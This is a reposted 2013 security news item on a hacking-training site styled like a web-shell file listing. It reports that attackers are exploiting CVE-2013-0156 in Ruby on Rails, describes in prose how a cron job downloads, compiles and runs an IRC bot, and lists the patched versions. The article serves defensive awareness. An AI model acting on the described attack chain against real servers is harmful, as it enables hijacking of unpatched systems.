ExtremeHacking
Today : | Time : | safemode : ON
> / Main Website / Cyber Surakha Abhiyan / Hackers Charity / Linkedin / facebook / twitter /
Name Author Perms Com Modified Label

Ruby on Rails exploit could hijack unpatched servers for botnet Unknown rwxr-xr-x 0 5/31/2013

Filename Ruby on Rails exploit could hijack unpatched servers for botnet
Permission rw-r--r--
Author Unknown
Date and Time 5/31/2013
Label
Action
Ethical Hacking Institute in Pune
./Arizona Team

Server Administrators are being urged to update their Ruby on Rails servers following the discovery of an active malware campaign targeting vulnerable versions of the web development framework.








































According to security researcher Jeff Jarmoc, Hackers are exploiting a known and patched vulnerability in coding language Ruby on Rails, which allows a remote user to edit the web server's crontab to download a file to the /tmp directory where it is compiled and executed

The exploit that is currently being used by attackers adds a custom chron job (a scheduled task on Linux machines) that executes a sequence of commands.

"Functionality is limited, but includes the ability to download and execute files as commanded, as well as changing servers," Jarmoc blogged. "There's no authentication performed, so an enterprising individual could hijack these bots fairly easily by joining the IRC server and issuing the appropriate commands."

The original flaw, announced in CVE-2013-0156, is located in the Ruby on Rails code that processes parameters.

Using this loophole hackers can download a malicious C source file from a remote server, can compile it locally and execute it. The resulting malware is a bot that connects to an IRC (Internet Relay Chat) server and joins a predefined channel where it waits for commands from the attackers.

Users should update the Ruby on Rails installations on their servers to at least versions 3.2.11, 3.1.10, 3.0.19 or 2.3.15 which contain the patch for this vulnerability.

www.arizonainfotech.com
CEH CHFI ECSA ENSA CCNA CCNA SECURITY MCITP RHCE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE
 

Cyber Suraksha Abhiyan | Sadik Shaikh © 2015 Sadik Shaikh | CEH V9 | ETHICAL HACKING Course Training Institute in India-Pune
Extreme Hacking Template design by Sadik Shaikh | Cyber Suraksha Abhiyan